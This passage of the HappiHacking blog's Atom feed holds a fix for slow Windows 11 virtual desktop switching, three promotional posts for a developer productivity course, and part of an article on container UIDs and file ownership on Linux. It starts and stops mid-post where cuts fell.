&lt;li&gt;&lt;code&gt;dev&lt;/code&gt;: The inverse of &lt;code&gt;prod&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In particular, &lt;code&gt;{mode, dev}&lt;/code&gt; implies the &lt;code&gt;{dev_mode, true}&lt;/code&gt; option, which
creates symbolic links instead of copying files when composing a release.
This means that you don&#39;t need to rebuild the release when you make a small
change during development; just recompiling is enough.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;We have gone through the most important concepts in Rebar3 and shown how
they interact and where the resulting files end up. We hope this has been
useful to beginners and seasoned programmers alike.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Why Windows 11 Virtual Desktop Switching Is Slow</title>
    <link href="https://happihacking.com/blog/posts/2024/slow_virtual_desktop_switching/"/>
    <updated>2024-12-17T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/slow_virtual_desktop_switching/</id>
    <summary>And How to Fix It</summary>
    <content type="html">&lt;h1 id=&quot;why-windows-11-virtual-desktop-switching-is-slow&quot; tabindex=&quot;-1&quot;&gt;Why Windows 11 Virtual Desktop Switching Is Slow&lt;/h1&gt;
&lt;p&gt;If switching between virtual desktops in Windows 11 feels slow, you&#39;re not alone. The likely cause is the &lt;em&gt;automatic accent color&lt;/em&gt; feature. While it may seem harmless, this feature can significantly impact performance, particularly if you are using multiple monitors or large background images.
&lt;img class=&quot;img-blog center&quot; src=&quot;https://happihacking.com/images/multimonitor2.jpg&quot; alt=&quot;A multi monitor setup&quot; title=&quot;A multi monitor setup&quot; /&gt;&lt;/p&gt;
&lt;h2 id=&quot;a-personal-encounter-with-the-slowdown&quot; tabindex=&quot;-1&quot;&gt;A Personal Encounter with the Slowdown&lt;/h2&gt;
&lt;p&gt;I had been frustrated with the slow virtual desktop switching in Windows 11 for some time. My PC has several virtual desktops-one for each project or company I&#39;m working on, along with one for home and one for gaming. To help easily identify which desktop I was on, I set up different background wallpapers for each one.&lt;/p&gt;
&lt;p&gt;My Linux and macOS systems handled desktop switching smoothly, so I couldn&#39;t understand why Windows 11 was struggling.&lt;/p&gt;
&lt;p&gt;While upgrading to Windows 11 24H2 and tidying up my system, I decided to investigate. What I found surprised me.&lt;/p&gt;
&lt;p&gt;Therefore, I created this post to remind myself in the future and possibly assist others seeking answers to this issue.&lt;/p&gt;
&lt;h2 id=&quot;how-automatic-accent-colors-slow-you-down&quot; tabindex=&quot;-1&quot;&gt;How Automatic Accent Colors Slow You Down&lt;/h2&gt;
&lt;p&gt;Automatic accent colors in Windows 11 work by scanning your desktop background to pick a dominant color for the system interface. The idea is to create a visually cohesive experience.&lt;/p&gt;
&lt;p&gt;Here’s the technical breakdown of what happens:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Image Analysis:&lt;/strong&gt; Windows analyzes your current background image.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Color Quantization:&lt;/strong&gt; The system reduces the image to a smaller set of dominant colors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Color Selection:&lt;/strong&gt; It chooses the most prominent hue and sets it as the accent color.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;While this process sounds lightweight, it becomes demanding when you use &lt;strong&gt;large, high-resolution background images&lt;/strong&gt; and especially if you have &lt;strong&gt;multiple monitors&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Every time you switch desktops, Windows recalculates the dominant accent color. For systems with high-resolution images, that’s a lot of pixels to process, which introduces noticeable delays.&lt;/p&gt;
&lt;h3 id=&quot;the-twist-wasted-calculations&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;The Twist: Wasted Calculations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Here’s what made the issue even more absurd on my system: I had the following two settings &lt;em&gt;turned off&lt;/em&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Show accent color on Start and Taskbar&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Show accent color on title bars and window borders&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This means I wasn’t even seeing the accent color most of the time, except in a few subtle UI elements like buttons. Yet, Windows continued recalculating the accent color in the background, wasting resources for a feature I wasn’t actively using.&lt;/p&gt;
&lt;h2 id=&quot;the-fix-disable-automatic-accent-colors&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;The Fix: Disable Automatic Accent Colors&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Thankfully, the fix is simple. By turning off automatic accent colors, you eliminate the unnecessary calculations and speed up virtual desktop switching.&lt;/p&gt;
&lt;p&gt;Here’s how to do it:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Open &lt;strong&gt;Settings&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Go to &lt;strong&gt;Personalization &amp;gt; Colors&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Under &amp;quot;Accent Color,&amp;quot; In the dropdown switch from  &amp;quot;Automatic&amp;quot; to &amp;quot;Manual&amp;quot;.&lt;/li&gt;
&lt;li&gt;Select a manual color instead.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;While you’re at it, you can also ensure the following are turned off (if you’re not using them):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Show accent color on Start and Taskbar&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Show accent color on title bars and window borders&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Windows 11’s automatic accent color feature is a nice touch for aesthetics, but it comes at a performance cost-especially if you’re not even using the accent color. By disabling it, you can reclaim snappy desktop switching and stop wasting resources on needless calculations.&lt;/p&gt;
&lt;p&gt;If your virtual desktops are crawling, give this fix a try. You might be surprised at how much faster things feel.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Level Up your Developer Productivity</title>
    <link href="https://happihacking.com/blog/posts/2024/gen_z_dev_course/"/>
    <updated>2024-11-26T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/gen_z_dev_course/</id>
    <summary>A New Course by HappiHacking</summary>
    <content type="html">&lt;h1 id=&quot;level-up-your-dev-game-from-bug-fixes-to-big-wins&quot; tabindex=&quot;-1&quot;&gt;Level Up Your Dev Game: From Bug Fixes to Big Wins&lt;/h1&gt;
&lt;p&gt;Hey, Gen-Z coders! You’re the digital natives, the champions of TikTok tutorials and side hustle startups.
But let’s be real: even the savviest tech wizard can feel stuck in the grind of endless sprints, debugging nightmares, and overwhelming to-do lists.
Fear not-our new course, &lt;em&gt;Developer Productivity Mastery&lt;/em&gt;, is here to help you slay the grind and reclaim your time, focus, and sanity.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;whats-this-course-all-about&quot; tabindex=&quot;-1&quot;&gt;What’s This Course All About?&lt;/h2&gt;
&lt;p&gt;Think of this course as your all-in-one productivity toolkit. It’s designed to help you find motivation, build habits, and master your workflow like the true boss you are.
Whether you’re managing your first big project or juggling a side hustle while learning Rust at 2 AM, we’ve got you covered.&lt;/p&gt;
&lt;p&gt;This isn’t some cookie-cutter “time management” fluff. It’s practical, actionable, and packed with the kind of hacks you’d DM your squad about.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;the-modules-thatll-change-your-dev-life&quot; tabindex=&quot;-1&quot;&gt;The Modules That’ll Change Your Dev Life&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;“Developer Productivity Mastery”&lt;/strong&gt; includes six power-packed modules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Module 1: Developer Motivation - Finding Your Why&lt;/strong&gt;
Learn to code with purpose and map out your career like the hero of an epic video game.
Spoiler: You’re also unlocking mentor-level skills to help others level up.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Module 2: Building Productive Habits and Routines&lt;/strong&gt;
Create habits that stick, so you can stop procrastinating and start thriving.
Yes, we’ll teach you how to actually finish that side project.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Module 3: Effective Time Management and Prioritization&lt;/strong&gt;
Master time-blocking, kill distractions, and finally hit that flow state you’ve been chasing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Module 4: Mastering Workflow Optimization and Automation&lt;/strong&gt;
Automate the boring stuff, optimize your tools, and learn how to work smarter, not harder.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Module 5: Building Better Collaboration and Communication&lt;/strong&gt;
Get the skills to lead your team, ace code reviews, and write documentation that doesn’t make your future self cry.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Module 6: Tools, Tricks, and Hacks for Better Development&lt;/strong&gt;
Shortcut your way to success with tips, tricks, and hacks for better coding and faster deployment.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;why-youll-love-it&quot; tabindex=&quot;-1&quot;&gt;Why You’ll Love It&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;No Boring Theory&lt;/strong&gt;
This is for the devs who want action, not lectures. Everything in the course is practical, relatable, and easy to implement-even if you’re running on caffeine and vibes.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Focus on Your Why&lt;/strong&gt;
Module 1 helps you define your goals so clearly that every commit, PR, and merge feels like a step toward your dream. You’ll leave this course as someone with a clear purpose in tech-and life.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Tools to Slay the Grind&lt;/strong&gt;
Modules 4 and 6 are like cheat codes for productivity. Whether it’s automating your workflows or discovering the best IDE plugins, we’ve got the hacks to keep your focus on what truly matters.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Next-Level Collaboration&lt;/strong&gt;
Gen-Z doesn’t work in silos, and neither should you. Module 5 is all about turning your communication and teamwork skills into superpowers. Say goodbye to awkward Slack messages and hello to leading your squad to glory.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;easter-eggs-for-the-meme-lords&quot; tabindex=&quot;-1&quot;&gt;Easter Eggs for the Meme Lords&lt;/h3&gt;
&lt;p&gt;We’ve packed the course with references you’ll love-from low-key nods to your favorite memes to challenges that feel more like side quests than chores. Productivity has never been this fun.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;what-youll-leave-with&quot; tabindex=&quot;-1&quot;&gt;What You’ll Leave With&lt;/h3&gt;
&lt;p&gt;When you finish this course, you’ll not only have streamlined your workflows but also boosted your confidence and clarity. Whether it’s your startup, your day job, or your dream side hustle, you’ll be ready to crush it like a boss.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;are-you-ready-to-level-up&quot; tabindex=&quot;-1&quot;&gt;Are You Ready to Level Up?&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;Developer Productivity Mastery&lt;/em&gt; is the boost your dev life needs. Sign up now and start your journey from chaos to controlled mastery. Think of it as the productivity glow-up you didn’t know you needed-but will never want to code without.&lt;/p&gt;
&lt;p&gt;Email  &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt; now to start slaying your dev grind like a pro! 🚀&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Mastering Developer Productivity</title>
    <link href="https://happihacking.com/blog/posts/2024/gen_x_dev_course/"/>
    <updated>2024-11-26T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/gen_x_dev_course/</id>
    <summary>A New Course by HappiHacking</summary>
    <content type="html">&lt;h1 id=&quot;from-gen-x-to-gen-excellence-a-developers-journey-to-productivity&quot; tabindex=&quot;-1&quot;&gt;From Gen-X to Gen-Excellence: A Developer&#39;s Journey to Productivity&lt;/h1&gt;
&lt;p&gt;Ah, Gen-X developers-the unsung heroes of the tech revolution.
You’re the bridge between punch cards and AI, the masterminds who survived the floppy disk apocalypse and witnessed the rise of the Internet in all its pixelated glory. But let’s face it: even the most seasoned coder can hit the dreaded &lt;em&gt;daily grind&lt;/em&gt; wall. Fear not, because &lt;em&gt;Mastering Developer Productivity&lt;/em&gt; is here to rekindle your spark, one Easter egg and Gen-X meme at a time.&lt;/p&gt;
&lt;h2 id=&quot;whats-this-course-all-about&quot; tabindex=&quot;-1&quot;&gt;What’s This Course All About?&lt;/h2&gt;
&lt;p&gt;It’s a call to action for developers stuck in the limbo of maintenance tasks, endless bug fixes, and chaotic Jira boards.
Remember the thrill of your first &lt;code&gt;Hello World&lt;/code&gt; program?
This course brings that magic back, guiding you through the essentials of motivation, workflow optimization, and habits that stick-because let’s admit it, old habits don’t just die hard; they respawn harder.&lt;/p&gt;
&lt;h3 id=&quot;course-overview&quot; tabindex=&quot;-1&quot;&gt;Course Overview&lt;/h3&gt;
&lt;p&gt;The new course, “Developer Productivity Mastery,” consists of six practical and empowering modules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Module 1: Developer Motivation - Finding Your Why
Rediscover your purpose and craft your personal hero’s journey, ultimately preparing you to step into the role of a mentor.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Module 2: Building Productive Habits and Routines
Learn how to establish habits that align with your goals for consistent focus and productivity.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Module 3: Effective Time Management and Prioritization
Master time-blocking, prioritization, and strategies to minimize distractions.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Module 4: Mastering Workflow Optimization and Automation
Discover how to eliminate bottlenecks, streamline workflows, and embrace automation tools.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Module 5: Building Better Collaboration and Communication
Hone your teamwork and communication skills for better collaboration and code reviews.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Module 6: Tools, Tricks, and Hacks for Better Development
Supercharge your development with insider tips, IDE extensions, and coding shortcuts.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;why-this-course-is-perfect-for-you&quot; tabindex=&quot;-1&quot;&gt;Why This Course is Perfect for You&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Nostalgia Meets Now&lt;/strong&gt;
We know you don’t need another lecture on “synergy” or “disruption.” Instead, we’ll help you optimize your workflow with tools that respect your experience, not reinvent the wheel. Think of it as upgrading your &lt;em&gt;Windows 95 mindset&lt;/em&gt; to match today’s needs-minus the Clippy pop-ups.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Motivation, Gamified&lt;/strong&gt;
Module 1 is all about rediscovering your “why.” You’ll craft a personal hero’s journey, not to remain the hero but to level up as the guide. Think Gandalf, Obi-Wan, or that wise mentor every story needs. The real Easter eggs? The friends and skills you’ve gained along the way, equipping you to lead others to greatness. Your role isn’t just about writing code; it’s about writing the legacy others will follow.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;No-BS Productivity Hacks&lt;/strong&gt;
From time-blocking to automation, Module 4 hands you the cheat codes for developer life. And no, these aren’t the CTRL+ALT+DEL kind-they’re about reclaiming your focus and time. Let’s turn “just one more email” into “just one more project milestone.”&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;easter-eggs-for-the-gen-x-soul&quot; tabindex=&quot;-1&quot;&gt;Easter Eggs for the Gen-X Soul&lt;/h3&gt;
&lt;p&gt;We’ve sprinkled the course with references only you’ll get. (Hint: remember &lt;em&gt;Zork&lt;/em&gt;?) Plus, the worksheets are filled with retro-themed tips-because who says work can’t feel like playing your favorite 8-bit RPG?&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;what-youll-leave-with&quot; tabindex=&quot;-1&quot;&gt;What You’ll Leave With&lt;/h3&gt;
&lt;p&gt;By the end of the course, you’ll not only optimize your workflows but also rediscover joy in your craft. You’ll be the mentor every millennial developer dreams of and the legend that even Gen Z looks up to. Yes, you can crush deadlines &lt;em&gt;and&lt;/em&gt; share the best coding memes on Slack.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;lets-do-this&quot; tabindex=&quot;-1&quot;&gt;Let’s Do This&lt;/h2&gt;
&lt;p&gt;Join &lt;em&gt;Mastering Developer Productivity&lt;/em&gt; today. Your career deserves an upgrade, and hey, you might just have fun along the way. Think of it as the ultimate LAN party for your professional life-snacks optional but highly encouraged.&lt;/p&gt;
&lt;p&gt;Just send an email (yes, we prefer old school email to fancy sign up boxes) to &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Developer Productivity</title>
    <link href="https://happihacking.com/blog/posts/2024/developer_productivity/"/>
    <updated>2024-11-26T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/developer_productivity/</id>
    <summary>A New Course by HappiHacking</summary>
    <content type="html">&lt;h1 id=&quot;developer-productivity-mastery-a-new-course-from-happihacking&quot; tabindex=&quot;-1&quot;&gt;Developer Productivity Mastery: A New Course from HappiHacking&lt;/h1&gt;
&lt;p&gt;Feeling stuck in your coding career is like debugging a problem with no stack trace-frustrating, time-consuming, and downright maddening. Maybe your workflows feel inefficient, your automation isn’t automating enough, or your team’s collaboration feels more like controlled chaos than smooth synergy. Whatever the challenge, HappiHacking&#39;s &lt;em&gt;Developer Productivity Mastery&lt;/em&gt; course is here to guide you out of the rut and into a place of clarity, focus, and success.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;whats-the-goal&quot; tabindex=&quot;-1&quot;&gt;What’s the Goal?&lt;/h2&gt;
&lt;p&gt;Imagine going from frustrated to efficient, from overwhelmed to organized. This course is designed to help developers at any stage of their career master their workflows, implement automation effectively, and communicate and collaborate like seasoned professionals. Whether you’re a solo dev or part of a large team, these skills will transform your approach to coding and project management.&lt;/p&gt;
&lt;p&gt;Let’s take your productivity to the next level, turning the daily grind into a well-paced rhythm where you’re in control of your tasks, tools, and time.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;whats-inside-the-course&quot; tabindex=&quot;-1&quot;&gt;What’s Inside the Course?&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Module 1: Developer Motivation - Finding Your Why&lt;/strong&gt;
We’ll start by rediscovering what drives you as a developer, helping you align your daily actions with your broader career goals. By the end of this module, you’ll have a renewed sense of purpose and direction.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module 2: Building Productive Habits and Routines&lt;/strong&gt;
Learn how to create and maintain habits that keep you focused, consistent, and efficient. This module emphasizes routines that fit seamlessly into your life, making productivity feel natural rather than forced.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module 3: Effective Time Management and Prioritization&lt;/strong&gt;
Dive into techniques like time-blocking, deep work, and effective task prioritization. This module is all about helping you reclaim your time, minimize distractions, and tackle your most important work with clarity.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module 4: Mastering Workflow Optimization and Automation&lt;/strong&gt;
Discover how to identify bottlenecks in your workflows and use tools and techniques to remove them. Learn to implement CI/CD, automated testing, and scripting to make repetitive tasks a thing of the past.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module 5: Building Better Collaboration and Communication&lt;/strong&gt;
Good teamwork doesn’t happen by accident. This module explores how to communicate clearly, conduct effective code reviews, and create a culture of accountability.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module 6: Tools, Tricks, and Hacks for Better Development&lt;/strong&gt;
From customizing your IDE to using AI-powered tools for suggestions and error detection, this module is packed with modern tips and techniques to enhance your coding experience.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;what-makes-this-course-different&quot; tabindex=&quot;-1&quot;&gt;What Makes This Course Different?&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Practical and Actionable&lt;/strong&gt;
No fluff-every module is designed with real-world applications in mind. You’ll learn techniques you can immediately put into practice to improve your workflow and efficiency.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Adaptable for All Developers&lt;/strong&gt;
Whether you’re just starting out or you’ve been in the industry for decades, this course offers value. The strategies and tools are versatile enough to fit any development role or experience level.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Focus on the Big Picture&lt;/strong&gt;
It’s not just about completing tasks-it’s about understanding how to work smarter, automate repetitive processes, and make your workflows as seamless as possible.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;why-take-this-course&quot; tabindex=&quot;-1&quot;&gt;Why Take This Course?&lt;/h2&gt;
&lt;p&gt;By the end of &lt;em&gt;Developer Productivity Mastery&lt;/em&gt;, you’ll have the tools, skills, and mindset to transform how you work. You’ll handle tasks with confidence, communicate effectively, and use the best tools and practices to optimize your development process.&lt;/p&gt;
&lt;p&gt;Ready to step out of stuck mode and into a productive flow? Contact HappiHacking today, by emailing &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt;, to learn more about this course and our coaching services.&lt;/p&gt;
&lt;p&gt;Let’s make your workday feel less like a grind and more like a game you’re winning!&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Dev Containers Part 3: UIDs and file ownership</title>
    <link href="https://happihacking.com/blog/posts/2024/dev-containers-uids/"/>
    <updated>2024-10-29T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/dev-containers-uids/</id>
    <content type="html">&lt;p&gt;This is the third entry in a series of posts on devcontainers; the first
entry is &lt;a href=&quot;https://happihacking.com/blog/posts/2023/dev-containers/&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In the &lt;a href=&quot;https://happihacking.com/blog/posts/2023/dev-containers-emacs/&quot;&gt;previous
post&lt;/a&gt;, we
showed how to configure devcontainers for a small project and how to
access the environment from within Emacs.&lt;/p&gt;
&lt;h2 id=&quot;the-project-directory-mount&quot; tabindex=&quot;-1&quot;&gt;The project directory mount&lt;/h2&gt;
&lt;p&gt;A running container is an isolated bubble, a separate operating system
instance, and by default it does not have access to the host&#39;s file system.
In order for the code running inside the container to have access to your
project files (but no other files on your system), the project root
directory in your local file system must be &lt;em&gt;mounted&lt;/em&gt; inside the container.
This is one of the things that devcontainers do automatically for you.&lt;/p&gt;
&lt;p&gt;Typically, the container runs a version of Linux, such as Ubuntu, or
Alpine, and it will see your files through the eyes of a Linux file system
with Unix-style User Identifers (UIDs), Group Identifers (GIDs), and
permission flags (read/write/execute). Although is possible to run Windows
or MacOS as the operating system inside the container, this article is only
about the Linux case.&lt;/p&gt;
&lt;p&gt;Your host system on the other hand could be anything - Windows (with an
NTFS file system), MacOS (with Apple File System), or another Linux system
running a typical Linux file system like &lt;code&gt;ext4&lt;/code&gt; natively.&lt;/p&gt;
&lt;p&gt;When a devcontainer is started (automatically by VSCode or some other
editor, or manually via the devcontainer CLI), the project root
&lt;code&gt;.../DIRNAME&lt;/code&gt; in the host file system gets mounted in the container under
the path &lt;code&gt;/workspace/DIRNAME&lt;/code&gt;, using a Docker &lt;em&gt;bind mount&lt;/em&gt;, so the
project&#39;s files can be accessed from within. This should just work with no
effort from you.&lt;/p&gt;
&lt;h2 id=&quot;file-ownership&quot; tabindex=&quot;-1&quot;&gt;File ownership&lt;/h2&gt;
&lt;p&gt;The big question is how the &amp;quot;user&amp;quot; inside the container - the processes
running on your behalf - can be allowed to read and modify these files. For
this to work, it must look to the container as if the files are owned by
the same user account as the one running the processes, or alternatively as
if the processes are running as the super-user (&lt;code&gt;root&lt;/code&gt; in Linux) who is
allowed to do anything.&lt;/p&gt;
&lt;p&gt;On Windows and Mac OS, there is a virtualization layer that maps between
the external user&#39;s own user ID and group ID (the ones used in the native
file system on the host), and the Linux-style UID and GID used by the
processes and the mounted files inside the container. Regardless of whether
the UID inside the container is 0 (root) or something else like 1000
(typically the first normal user account in Linux), the virtualization will
translate the file ownership so the processes in the container may access
the files, and outside the container, it looks like it was you who made the
changes directly in the host file system, e.g. NTFS on Windows.&lt;/p&gt;
&lt;p&gt;On Linux, however, there is no virtualization, just sandboxing, and all
UIDs and GIDs are passed through directly between the container and the
host system. It is more efficient, but at the same time it can be quite
confusing.&lt;/p&gt;
&lt;h2 id=&quot;devcontainers-on-linux&quot; tabindex=&quot;-1&quot;&gt;Devcontainers on Linux&lt;/h2&gt;
&lt;p&gt;If you&#39;re only running on Mac OS or Windows and it&#39;s not your job to
actually fiddle with the devcontainer configuration, then congratulations,
you can skip the rest of this article. But if you need to understand what
happens on a Linux host and want to make sure your containers are
configured properly, then read on.&lt;/p&gt;
&lt;h3 id=&quot;no-uidgid-translation&quot; tabindex=&quot;-1&quot;&gt;No UID/GID translation&lt;/h3&gt;
&lt;p&gt;Symptoms of this lack of translation can be:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Processes in the container are not allowed to read or write files in the
workspace.&lt;/p&gt;
&lt;p&gt;Typically, this happens if the UID inside the container is 1000 but your
actual UID on the host system is 1001, or vice versa.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Files or directories that were created inside the container cannot be
modified or deleted outside the container because they are owned by root.&lt;/p&gt;
&lt;p&gt;This happens if the container processes run as UID 0. They will always
be allowed to create or modify files in the workspace, but any files or
directories created will be owned by UID 0 also in the host file system.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id=&quot;uid-update&quot; tabindex=&quot;-1&quot;&gt;UID Update&lt;/h3&gt;
&lt;p&gt;Devcontainers do have a &amp;quot;UID update&amp;quot; functionality on Linux. It is however
not a mapping like the one done on Windows or Mac OS. It&#39;s just some extra
code that, as the container starts, will check if the external UID is
different from the internal, and if so, it will update the UID within the
container (by straight up modifying the internal &lt;code&gt;/etc/passwd&lt;/code&gt; file) to be
the same as the external one. It will also update the Group ID in the same
way.&lt;/p&gt;
&lt;p&gt;The problem is that it only works under these conditions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The UID inside the container must not be 0 (root), since that account
is special and cannot be given another ID.&lt;/li&gt;
&lt;li&gt;The external UID must not already be in use by some other account
inside the container, so that the update does not cause a clash.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If these conditions are not met, UID updating is skipped, and the container
will run with its default UID.&lt;/p&gt;
&lt;h3 id=&quot;when-it-works&quot; tabindex=&quot;-1&quot;&gt;When it works&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;If your external user happens to be UID 1000, as it typically is on a
single user Linux system, and the container also runs as UID 1000
internally, then no UID update is needed and things just work.&lt;/li&gt;
&lt;li&gt;If the container runs as any account except root, such as UID 1000, and
your external user is something else such as UID 1001 (or 1017 or
whatever), as it might be on a multi user Linux system, then as long as
the container does not have another account internally that could clash
with yours, the UID update will happen and things will also just work.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;when-it-doesnt-work&quot; tabindex=&quot;-1&quot;&gt;When it doesn&#39;t work&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Many containers have been designed to run as root internally, through a
&lt;code&gt;USER&lt;/code&gt; declaration in the Dockerfile, and this will result in symptom 2
above.&lt;/li&gt;
&lt;li&gt;Some containers have multiple user accounts internally, which can prevent
UID update. For example, if the container is set up to run its processes
as UID 1001, and your external UID is 1000, then the UID update would try
to make the container use 1000 instead - but if that UID is already in
use within the container, then the update fails, and the container
processes will use its default UID, probably resulting in symptom 1
above.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The latter can easily happen when the Dockerfile that specifies the dev
container starts from a base image assuming it has no user with UID 1000 or
above, and then creates a new user with something like &lt;code&gt;RUN useradd&lt;/code&gt;
for its own purposes. If the assumption is wrong and UID 1000 already
exists in the base image, the new user will get UID 1001, and it might work
fine on Windows and Mac OS thanks to the virtualization, but breaks on a
Linux host.&lt;/p&gt;
&lt;h3 id=&quot;overriding-the-base-container&quot; tabindex=&quot;-1&quot;&gt;Overriding the base container&lt;/h3&gt;
&lt;p&gt;Luckily, most problems can be fixed in the &lt;code&gt;devcontainer.json&lt;/code&gt; file, if it
is not in your power to rebuild the container image.&lt;/p&gt;
&lt;p&gt;First of all, you can set &lt;code&gt;containerUser&lt;/code&gt; to override the default for all
processes, or you can set &lt;code&gt;remoteUser&lt;/code&gt; to just override the user for
devcontainer commands.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;&amp;quot;containerUser&amp;quot;: &amp;quot;name-or-UID&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is like specifying &lt;code&gt;USER&lt;/code&gt; in a Dockerfile, so all the container&#39;s
processes will launch as that user by default.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;&amp;quot;remoteUser&amp;quot;: &amp;quot;name-or-UID&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This only changes the user for running commands from the outside with
&lt;code&gt;devcontainer exec&lt;/code&gt;. This is also what happens when a tool like VSCode runs
